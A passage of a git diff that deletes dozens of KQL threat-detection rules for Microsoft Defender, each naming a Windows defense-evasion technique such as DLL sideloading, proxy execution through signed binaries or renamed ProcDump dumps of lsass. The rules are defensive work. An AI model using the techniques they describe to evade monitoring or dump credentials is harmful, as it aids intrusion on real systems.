-| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql
deleted file mode 100644
index 65ae682e..00000000
--- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/08/08
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql
deleted file mode 100644
index 413eb321..00000000
--- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/08/02
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Provisioning\\Commands"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql b/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql
deleted file mode 100644
index 3d2de651..00000000
--- a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/08/08
-// Level: medium
-// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql b/Defense Evasion/Potential_Qakbot_Registry_Activity.kql
deleted file mode 100644
index ad4f810d..00000000
--- a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Hieu Tran
-// Date: 2023/03/13
-// Level: high
-// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Software\\firm\\soft\\Name"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index 0be2e25f..00000000
--- a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron
-// Date: 2019/02/07
-// Level: medium
-// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql b/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql
deleted file mode 100644
index dc23a7d8..00000000
--- a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: high
-// Description: Detects potential DLL sideloading of rcdll.dll
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
deleted file mode 100644
index 6e6b74ac..00000000
--- a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
-// Tags: attack.execution, attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql b/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql
deleted file mode 100644
index aacb4100..00000000
--- a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/11/05
-// Level: medium
-// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql b/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql
deleted file mode 100644
index c2b94749..00000000
--- a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/07/13
-// Level: medium
-// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n "))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
deleted file mode 100644
index fef361b2..00000000
--- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
deleted file mode 100644
index 172b3879..00000000
--- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql b/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql
deleted file mode 100644
index bd581c2f..00000000
--- a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/14
-// Level: medium
-// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql b/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql
deleted file mode 100644
index a90ebb2b..00000000
--- a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harjot Singh, '@cyb3rjy0t'
-// Date: 2023/01/21
-// Level: high
-// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql b/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql
deleted file mode 100644
index 1bf5a890..00000000
--- a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
deleted file mode 100644
index 5c5ff61b..00000000
--- a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql
deleted file mode 100644
index 5e537033..00000000
--- a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql
deleted file mode 100644
index dcb505a7..00000000
--- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/11
-// Level: high
-// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql
deleted file mode 100644
index cf35cdc2..00000000
--- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/12
-// Level: high
-// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey contains "\\Policies\\Microsoft\\Windows\\Appx") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql b/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql
deleted file mode 100644
index 83ffa4c6..00000000
--- a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/01
-// Level: high
-// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql
deleted file mode 100644
index fbd5181d..00000000
--- a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql b/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql
deleted file mode 100644
index 8c70124d..00000000
--- a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: high
-// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
-The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
-Attackers abuse this utility to install malicious MOF scripts
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql b/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql
deleted file mode 100644
index d95b611c..00000000
--- a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/01
-// Level: medium
-// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql b/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql
deleted file mode 100644
index 4bfe12e2..00000000
--- a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/29
-// Level: medium
-// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
-Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql b/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql
deleted file mode 100644
index 5269be55..00000000
--- a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith 